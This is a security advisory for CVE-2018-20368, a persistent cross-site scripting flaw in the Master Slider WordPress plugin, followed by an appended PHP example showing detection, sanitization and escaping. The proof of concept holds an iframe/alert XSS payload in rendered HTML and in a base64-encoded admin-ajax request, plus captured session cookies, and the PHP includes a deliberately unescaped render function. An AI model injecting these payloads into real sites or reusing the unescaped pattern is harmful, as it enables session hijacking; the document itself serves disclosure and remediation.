Document Title:
===============
WP Master Slider v3.5.1 - Cross Site Scripting Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2158

Reference: https://wordpress.org/support/?post_type=topic&p=10874555
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-20368

CVE-ID:
=======
CVE-2018-20368

Release Date:
=============
2018-11-14

Vulnerability Laboratory ID (VL-ID):
====================================
2158

Common Vulnerability Scoring System:
====================================
4.3

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Master Slider WordPress slider plugin is a premium image and content slider with super smooth hardware accelerated transitions. It supports touch navigation with pure swipe gesture, that you have never experienced before. Master Slider is a truly responsive and device friendly slider which works perfectly on all major devices. Master Slider plugin is a well done layer slider as well, with the ability to add any HTML contents (texts, images, …) in layers. It is easy to use, plus there are 80+ ready to use sample sliders for you. You have almost everything such as hotspots, thumbnails, video support, a variety of effects, and many more features in this plugin. Master Slider WordPress slider is the most complete among the best sliders.

(Copy of the Homepage: https://wordpress.org/plugins/master-slider )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site scripting vulnerability in the official Master Slider v3.5.1 wordpress plugin.

Vulnerability Disclosure Timeline:
==================================
2018-11-14: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Averta Ltd
Product: Master Slider - Wordpress Plugin 3.2.7

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (Guest Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Full Disclosure

Technical Details & Description:
================================
A persistent cross site scripting web vulnerability has been discovered in the official Master Slider v3.5.1 wordpress plugin. The vulnerability allows remote attackers to inject unauthorized malicious script code on the application-side of the affected module.

The persistent cross site scripting web vulnerability is located in the `name` input field of the `MSPanel.Settings` value on `callback`. The injection point of the vulnerability is the input field; the execution point is the master-slider listing page, which renders the stored value after the insert or edit. The attack vector is located on the application-side and the request method to inject is POST. Exploitation of the issue requires a privileged web-application user account and only low user interaction. Successful exploitation of the application-side vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent manipulation of the affected or connected module context.

Proof of Concept (PoC):
=======================
The xss vulnerability can be exploited by authenticated remote attackers with low user interaction. For security demonstration or to reproduce the issue follow the provided information and steps below.
PoC: Master Slider (Item Listing)

<tfoot>
<tr>
<th scope="col" class="manage-column column-ID sortable desc" style=""><a href="https://wp.localhost:8080/wp-admin/admin.php?page=master-slider&orderby=ID&order=asc"><span>ID</span><span class="sorting-indicator"></span></a></th>
<th scope="col" class="manage-column column-title" style="">Name</th>
<th scope="col" class="manage-column column-shortcode" style="">Shortcode</th>
<th scope="col" class="manage-column column-slides_num" style="">Slides</th>
<th scope="col" class="manage-column column-type" style="">Typ</th>
<th scope="col" class="manage-column column-date_modified sortable desc" style=""><a href="https://wp.localhost:8080/wp-admin/admin.php?page=master-slider&orderby=date_modified&order=asc"><span>Zuletzt modifiziert</span><span class="sorting-indicator"></span></a></th>
<th scope="col" class="manage-column column-date_created sortable desc" style=""><a href="https://wp.localhost:8080/wp-admin/admin.php?page=master-slider&orderby=date_created&order=asc"><span>Erstellungsdatum</span><span class="sorting-indicator"></span></a></th>
<th scope="col" class="manage-column column-action" style="">Aktion</th>
</tr>
</tfoot>
<tbody id="the-list" data-wp-lists="list:slider">
<tr class="alternate">
<td class="ID column-ID">5</td>
<td class="title column-title"><a href="/wp-admin/admin.php?page=master-slider&action=edit&slider_id=5">Suche, Sitemap, 404</a></td>
<td class="shortcode column-shortcode">[masterslider id="5"]</td>
<td class="slides_num column-slides_num">4</td>
<td class="type column-type"></td>
<td class="date_modified column-date_modified"><abbr title="2018/10/12 @ 11:41:39 AM">6 Tagen zurück</abbr></td>
<td class="date_created column-date_created"><abbr title="2018/10/12 @ 11:28:05 AM">2018/10/12</abbr></td>
<td class="action column-action">
<a class="action-duplicate msp-ac-btn msp-btn-gray msp-iconic" href="/wp-admin/admin.php?page=master-slider&action=duplicate&slider_id=5&paged"><span></span>duplicate</a>
<a class="action-delete msp-ac-btn msp-btn-red msp-iconic" href="/wp-admin/admin.php?page=master-slider&action=delete&slider_id=5&paged" onclick="return confirm('Bist Du sicher, dass du diesen Slider löschen möchtest?');"><span></span>delete</a>
<a class="action-preview msp-ac-btn msp-btn-blue msp-iconic" href="/wp-admin/admin.php?page=master-slider&action=preview&slider_id=5" onclick="lunchMastersliderPreviewBySliderID(5);return false;"><span></span>preview</a>
</td>
</tr>
<tr>
<td class="ID column-ID">8</td>
<td class="title column-title"><a href="/wp-admin/admin.php?page=master-slider&action=edit&slider_id=8">Wasserwerke</a></td>
<td class="shortcode column-shortcode">[masterslider id="8"]</td>
<td class="slides_num column-slides_num">2</td>
<td class="type column-type"></td>
<td class="date_modified column-date_modified"><abbr title="2018/10/12 @ 11:43:09 AM">6 Tagen zurück</abbr></td>
<td class="date_created column-date_created"><abbr title="2018/10/12 @ 11:28:05 AM">2018/10/12</abbr></td>
<td class="action column-action">
<a class="action-duplicate msp-ac-btn msp-btn-gray msp-iconic" href="/wp-admin/admin.php?page=master-slider&action=duplicate&slider_id=8&paged"><span></span>duplicate</a>
<a class="action-delete msp-ac-btn msp-btn-red msp-iconic" href="/wp-admin/admin.php?page=master-slider&action=delete&slider_id=8&paged" onclick="return confirm('Bist Du sicher, dass du diesen Slider löschen möchtest?');"><span></span>delete</a>
<a class="action-preview msp-ac-btn msp-btn-blue msp-iconic" href="/wp-admin/admin.php?page=master-slider&action=preview&slider_id=8" onclick="lunchMastersliderPreviewBySliderID(8);return false;"><span></span>preview</a>
</td>
</tr>
<tr class="alternate">
<td class="ID column-ID">11</td>
<td class="title column-title"><a href="/wp-admin/admin.php?page=master-slider&action=edit&slider_id=11">Startseite</a></td>
<td class="shortcode column-shortcode">[masterslider id="11"]</td>
<td class="slides_num column-slides_num">4</td>
<td class="type column-type"></td>
<td class="date_modified column-date_modified"><abbr title="2018/10/12 @ 11:36:21 AM">6 Tagen zurück</abbr></td>
<td class="date_created column-date_created"><abbr title="2018/10/12 @ 11:28:06 AM">2018/10/12</abbr></td>
<td class="action column-action">
<a class="action-duplicate msp-ac-btn msp-btn-gray msp-iconic" href="/wp-admin/admin.php?page=master-slider&action=duplicate&slider_id=11&paged"><span></span>duplicate</a>
<a class="action-delete msp-ac-btn msp-btn-red msp-iconic" href="/wp-admin/admin.php?page=master-slider&action=delete&slider_id=11&paged" onclick="return confirm('Bist Du sicher, dass du diesen Slider löschen möchtest?');"><span></span>delete</a>
<a class="action-preview msp-ac-btn msp-btn-blue msp-iconic" href="/wp-admin/admin.php?page=master-slider&action=preview&slider_id=11" onclick="lunchMastersliderPreviewBySliderID(11);return false;"><span></span>preview</a>
</td>
</tr>
<tr>
<td class="ID column-ID">15</td>
<td class="title column-title"><a href="/wp-admin/admin.php?page=master-slider&action=edit&slider_id=15"> test><"<img>%20%20>"<iframe src="evil.source" onload="alert("PENTEST")">>"<iframe src=evil.source onload=alert("PENTEST")>[EXECUTION POINT!]</a></td>
<td class='shortcode column-shortcode'>[masterslider id="15"]</td>
<td class='slides_num column-slides_num'>1</td>
<td class='type column-type'></td>
<td class='date_modified column-date_modified'><abbr title="2018/10/18 @ 10:37:08 AM">2 Stunden zurück</abbr></td>
<td class='date_created column-date_created'><abbr title="2018/10/18 @ 10:33:08 AM">2018/10/18</abbr></td>
<td class='action column-action'>
<a class="action-duplicate msp-ac-btn msp-btn-gray msp-iconic" href="/wp-admin/admin.php?page=master-slider&action=duplicate&slider_id=15&paged"><span></span>duplicate</a>
<a class="action-delete msp-ac-btn msp-btn-red msp-iconic" href="/wp-admin/admin.php?page=master-slider&action=delete&slider_id=15&paged" onClick="return confirm('Bist Du sicher, dass du diesen Slider löschen möchtest?');" ><span></span>delete</a>
<a class="action-preview msp-ac-btn msp-btn-blue msp-iconic" href="/wp-admin/admin.php?page=master-slider&action=preview&slider_id=15" onClick="lunchMastersliderPreviewBySliderID(15);return false;" ><span></span>preview</a>
</td>
</tr>
</tbody>
</table>


--- PoC Session Logs ---
Injection Point: https://wp.localhost:8080/wp-admin/admin-ajax.php
Host: wp.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://wp.localhost:8080/wp-admin/admin.php?page=master-slider&action=edit&slider_id=15
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 2804
Cookie: wordpress_sec_1547bd92e799236af84e94f=evolution-security%7C1540022551%7CLIA3SdTGrpO1RMuSM4pAZdgVovv68eONarU2dUeKCOS%7C9cdd7f1ec32368ff2447af70851842444a8cca3e6223df2bf6e10f8251202831; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_1547bd92e799134fe929c236af84e94f=evolution-security%7C1540022551%7CLIA3SdTGrpO1RMuSM4eONarU2dUeKCOS%7C31a9303a9369483a20f7115b853bbef72e0d6f2735839426e56ac48b53d3b62c; wp-settings-time-21=1539851588; wp-settings-21=libraryContent%3Dbrowse
Connection: keep-alive

action=msp_panel_handler&nonce=a03c4c229b&msp_data=eyJtZXRhIjp7IlNldHRpbmdzIWlkcyI6IjEiLCJTZXR0aW5ncyFuZXh0SWQiOjIsIlNsaWRlIWlkcyI6IjEiLCJTbGlkZSFuZXh0SWQiO
jIsIkNvbnRyb2whaWRzIjoiMSIsIkNvbnRyb2whbmV4dElkIjoyLCJDYWxsYmFjayFpZHMiOiIxIiwiQ2FsbGJhY2shbmV4dElkIjoyfSwiTVNQYW5lbC5TZXR0aW5ncyI6eyIxIjoie1wiaWRcIjpcIjFcIix
cInNuYXBwaW5nXCI6dHJ1ZSxcImRpc2FibGVDb250cm9sc1wiOmZhbHNlLFwibmFtZVwiOlwiYWFhPjxcXFwiPGltZz4lMjAlMjA+XFxcIjxpZnJhbWUgc3JjPWV2aWwuc291cmNlIG9ubG9hZD1hbGVydCgiUEVOVEVTVCIpPj5cXFwiPGlmcmFtZSBzcmM9ZXZpbC5zb3VyY2Ugb25sb2FkPWFsZXJ0KCJQRU5URVNUIik+XCIsXCJ3aWR0aFwiOlwiMTAwMFwiLFwiaGVpZ2h0XCI6XCI1MDBcIixcIndyYXBwZXJXaWR0aFVuaXRcIjpcInB4XCIsXCJhdXRvQ3JvcFwiOmZhbHNlLFwidHlwZVwiOlwiY3VzdG9tXCIsXCJzbGlkZXJ
JZFwiOlwiMTVcIixcImVuYWJsZU92ZXJsYXlMYXllcnNcIjp0cnVlLFwibGF5b3V0XCI6XCJib3hlZFwiLFwiYXV0b0hlaWdodFwiOmZhbHNlLFwidHJWaWV3XCI6XCJiYXNpY1wiLFwic3BlZWRcIjpcIjI
wXCIsXCJzcGFjZVwiOlwiMFwiLFwic3RhcnRcIjpcIjFcIixcImdyYWJDdXJzb3JcIjpcIjFcIixcInN3aXBlXCI6XCIxXCIsXCJtb3VzZVwiOlwiMVwiLFwid2hlZWxcIjpcIlwiLFwiYXV0b3BsYXlcIjp
cIlwiLFwibG9vcFwiOlwiXCIsXCJzaHVmZmxlXCI6XCJcIixcInByZWxvYWRcIjpcIi0xXCIsXCJvdmVyUGF1c2VcIjpcIjFcIixcImVuZFBhdXNlXCI6XCJcIixcImhpZGVMYXllcnNcIjpcIlwiLFwiZGly
XCI6XCJoXCIsXCJwYXJhbGxheE1vZGVcIjpcInN3aXBlXCIsXCJ1c2VEZWVwTGlua1wiOmZhbHNlLFwiZGVlcExpbmtUeXBlXCI6XCJwYXRoXCIsXCJzY3JvbGxQYXJhbGxheE1vdmVcIjozMCxcInNjcm9sb
FBhcmFsbGF4QkdNb3ZlXCI6NTAsXCJzY3JvbGxQYXJhbGxheEZhZGVcIjp0cnVlLFwiY2VudGVyQ29udHJvbHNcIjpcIjFcIixcImluc3RhbnRTaG93TGF5ZXJzXCI6XCJcIixcImNsYXNzTmFtZVwiOlwiPl
xcXCI8aWZyYW1lIHNyYz1ldmlsLnNvdXJjZSBvbmxvYWQ9YWxlcnQoIlBFTlRFU1QiKT5cIixcImN1c3RvbVN0eWxlXCI6XCI+XFxcIjxpZnJhbWU+ICUyMCA+XFxcIjxpZnJhbWUgc3JjPWE+XCIsXCJza2luXCI6XCJtcy1za2luLWRlZmF1bHRcIixcIm1zVGVtcGxhdGVcIjpcImN1c3RvbVwiLFwibXNUZW1wbGF0ZUNsYXNzXCI6XCJcIixcInVzZWRGb250c1wiOlwiXCJ9In0sIk1TUGFuZWwuU2xpZ
GUiOnsiMSI6IntcImlkXCI6XCIxXCIsXCJ0aW1lbGluZV9oXCI6MjAwLFwiYmdUaHVtYlwiOlwiLzIwMTgvMTAvMS0xNTB4MTUwLnBuZ1wiLFwiaXNPdmVybGF5TGF5ZXJzXCI6ZmFsc2UsXCJvcmRlclwiOjA
sXCJiZ1wiOlwiLzIwMTgvMTAvMS5wbmdcIixcImR1cmF0aW9uXCI6XCIzXCIsXCJmaWxsTW9kZVwiOlwiZmlsbFwiLFwiYmd2X2ZpbGxtb2RlXCI6XCJmaWxsXCIsXCJiZ3ZfbG9vcFwiOlwiMVwiLFwiYmd2X
211dGVcIjpcIjFcIixcImJndl9hdXRvcGF1c2VcIjpcIlwiLFwiYmdBbHRcIjpcIj5cXFwiPGlmcmFtZT4gJTIwID5cXFwiPGlmcmFtZSBzcmM9YT5cIixcImJnVGl0bGVcIjpcIj5cXFwiPGlmcmFtZT4gJTI
wID5cXFwiPGlmcmFtZSBzcmM9YT5cIixcImxheWVyX2lkc1wiOltdfSJ9LCJNU1BhbmVsLkNvbnRyb2wiOnsiMSI6IntcImlkXCI6XCIxXCIsXCJsYWJlbFwiOlwiUGZlaWxlXCIsXCJuYW1lXCI6XCJhcnJvd
3NcIixcImF1dG9IaWRlXCI6dHJ1ZSxcIm92ZXJWaWRlb1wiOnRydWUsXCJpbnNldFwiOnRydWV9In0sIk1TUGFuZWwuQ2FsbGJhY2siOnsiMSI6IntcImlkXCI6XCIxXCIsXCJsYWJlbFwiOlwiQmVpIEluaXRp
YWxpc2VydW5nIGRlcyBTbGlkZXJzXCIsXCJuYW1lXCI6XCJJTklUXCIsXCJjb250ZW50XCI6XCI+XFxcIjxpZnJhbWUgc3JjPWV2aWwuc291cmNlIG9ubG9hZD1hbGVydCgiUEVOVEVTVCIpPlwifSJ9fQ
&preset_style=eyJtZXRhIjp7fX0=&preset_effect=eyJtZXRhIjp7fX0=&buttons=eyJtZXRhIjp7fX0=&slider_id=15

POST: HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 08:46:54 GMT
Server: Apache
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Content-Length: 55
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/json


Execution Point: https://wp.localhost:8080/wp-admin/admin.php?page=master-slider
Host: wp.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://wp.localhost:8080/wp-admin/admin.php?page=master-slider
Cookie: wordpress_sec_1547bd92e799f=evolution-security%7C1540022551%7CLIA3SdTGrpO1RMuSM4pAZdgVovv68eONarU2dUeKCOS%7C9cdd7f1ec32368ff2447af70851842444a8cca3e6223df2bf6e10f8251202831; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_1547bd92e799134fe929c236af84e94f=evolution-security%7C1540022551%7CLIA3SdTGrpO1RMuSM4pAZdgVovv68eONarU2dUeKCOS%7C31a9303a9369483a20f7115b853bbef72e0d6f2735839426e56ac48b53d3b62c; wp-settings-time-21=1539851588; wp-settings-21=libraryContent%3Dbrowse
Connection: keep-alive
Upgrade-Insecure-Requests: 1

GET: HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 08:41:21 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20665
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


https://wp.localhost:8080/wp-admin/load-styles.php?c=1&dir=ltr&load[]=dashicons,admin-bar,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-pointer,widgets&load[]=,site-icon,l10n,buttons,wp-auth-check,wp-color-picker&ver=4.9.8
Host: wp.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/css,*/*;q=0.1
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://wp.localhost:8080/wp-admin/admin.php?page=master-slider
Cookie: wordpress_sec_1547bd92e799f=evolution-security%7C1540022551%7CLIA3SdTGrpO1RMuSM4pAZdgVovv68eONarU2dUeKCOS%7C9cdd7f1ec32368ff2447af70851842444a8cca3e6223df2bf6e10f8251202831; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_1547bd92e799134fe929c236af84e94f=evolution-security%7C1540022551%7CLIA3SdTGrpO1RMuSM4pAZdgVovv68eONarU2dUeKCOS%7C31a9303a9369483a20f7115b853bbef72e0d6f2735839426e56ac48b53d3b62c; wp-settings-time-21=1539851588; wp-settings-21=libraryContent%3Dbrowse
Connection: keep-alive

GET: HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 08:40:21 GMT
Server: Apache
Etag: 4.9.8
Expires: Fri, 18 Oct 2019 08:40:21 GMT
Cache-Control: public, max-age=31536000
Vary: Accept-Encoding
Content-Encoding: deflate
Content-Type: text/css; charset=UTF-8


Reference(s):
https://wp.localhost:8080/wp-admin/admin.php
https://wp.localhost:8080/wp-admin/admin-ajax.php
https://wp.localhost:8080/wp-admin/admin.php?page=master-slider

Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely validating the title input value at the injection point (the `name` field of the `MSPanel.Settings` data) before it is stored.
In a second step, the output of the master-slider listing needs to be escaped as well, so that a stored value can no longer reach the execution point as markup.

Security Risk:
==============
The security risk of the cross site scripting web vulnerability in the wordpress plugin is estimated as medium.

Credits & Authors:
==================
Vulnerability-Lab [research@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com          www.vuln-lab.com                 www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com     paste.vulnerability-db.com       infosec.vulnerability-db.com
Social:     twitter.com/vuln_lab               facebook.com/VulnerabilityLab    youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php  vulnerability-lab.com/rss/rss_upcoming.php  vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php   vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material, contact (admin@ or research@) to ask for permission.

Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™
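Appendix (editor's added example, not part of the original advisory and not the Master Slider plugin's code): the block below illustrates the two-step fix from the Solution section in plain PHP, using the request shape shown in the PoC session log. It decodes an `msp_data` parameter (base64 of JSON whose `MSPanel.Settings` entries are themselves JSON strings, as reconstructed from the log), flags settings entries whose `name` carries markup (useful for log review or a request filter), sanitizes the value at the injection point, and renders the listing's title cell both unencoded, as the advisory describes it, and encoded. The function names and the sample payload are constructed for this example; in a WordPress plugin the equivalents of the two helpers are `sanitize_text_field()` on input and `esc_html()` on output.

```php
<?php
// Added example for this advisory (not the Master Slider plugin's own code).
// The msp_data layout (base64 -> JSON -> per-entry JSON strings) is reconstructed
// from the PoC session log; all function names are hypothetical. In a WordPress
// plugin, use sanitize_text_field() on input and esc_html() on output instead
// of the look-alike helpers below.

declare(strict_types=1);

/** Decode msp_data: base64 -> outer JSON -> nested JSON per panel entry. */
function decode_msp_data(string $msp_data): array
{
    $raw = base64_decode($msp_data, true);
    $outer = $raw === false ? null : json_decode($raw, true);
    if (!is_array($outer)) {
        throw new InvalidArgumentException('msp_data is not base64-encoded JSON');
    }
    foreach ($outer as $panel => $entries) {
        if ($panel === 'meta' || !is_array($entries)) {
            continue; // "meta" only holds id counters, not panel entries
        }
        foreach ($entries as $id => $entry) {
            // MSPanel.Settings / Slide / Control / Callback values arrive as JSON strings
            $outer[$panel][$id] = is_string($entry) ? json_decode($entry, true) : $entry;
        }
    }
    return $outer;
}

/** Detection aid: MSPanel.Settings names that change when tags are stripped, i.e. carry markup. */
function find_markup_in_names(array $decoded): array
{
    $hits = [];
    foreach ($decoded['MSPanel.Settings'] ?? [] as $id => $settings) {
        $name = (string) ($settings['name'] ?? '');
        if ($name !== strip_tags($name)) {
            $hits[$id] = $name;
        }
    }
    return $hits;
}

/** Step 1 (injection point): strip tags and collapse whitespace before the value is stored. */
function sanitize_slider_name(string $name): string
{
    return trim((string) preg_replace('/\s+/', ' ', strip_tags($name)));
}

/** Step 2 (execution point): encode for an HTML text node, like WordPress esc_html(). */
function esc_html_compat(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Listing cell as the advisory describes it: the stored name lands in the markup unencoded. */
function render_title_cell_vulnerable(int $slider_id, string $name): string
{
    return '<td class="title column-title"><a href="/wp-admin/admin.php?page=master-slider&amp;action=edit&amp;slider_id='
        . $slider_id . '">' . $name . '</a></td>';
}

/** Hardened listing cell: the only difference is that the dynamic value is encoded. */
function render_title_cell_safe(int $slider_id, string $name): string
{
    return '<td class="title column-title"><a href="/wp-admin/admin.php?page=master-slider&amp;action=edit&amp;slider_id='
        . $slider_id . '">' . esc_html_compat($name) . '</a></td>';
}

// Constructed sample in the same shape as the PoC request (not the advisory's own base64 blob).
$settings = [
    'id'       => '1',
    'name'     => 'test><"<img>"<iframe src=evil.source onload=alert("PENTEST")>',
    'sliderId' => '15',
];
$sample = base64_encode(json_encode([
    'meta'             => ['Settings!ids' => '1', 'Settings!nextId' => 2],
    'MSPanel.Settings' => ['1' => json_encode($settings)],
]));

$decoded = decode_msp_data($sample);
foreach (find_markup_in_names($decoded) as $id => $name) {
    echo "MSPanel.Settings[$id].name carries markup: $name\n";
}
echo 'stored name after step 1: ', sanitize_slider_name($settings['name']), "\n";
echo 'vulnerable cell: ', render_title_cell_vulnerable(15, $settings['name']), "\n";
echo 'hardened cell:   ', render_title_cell_safe(15, $settings['name']), "\n";
```

Run it with `php example.php`. The detection helper treats any name that `strip_tags()` would alter as suspicious, which also catches entries written before a fix was deployed; the two render functions differ only in the encoding call, which is the whole of the second step the advisory asks for. Encoding on output is what closes the execution point; the input sanitizer is defence in depth, since other code paths (callbacks, slide titles, class names) carry the same data.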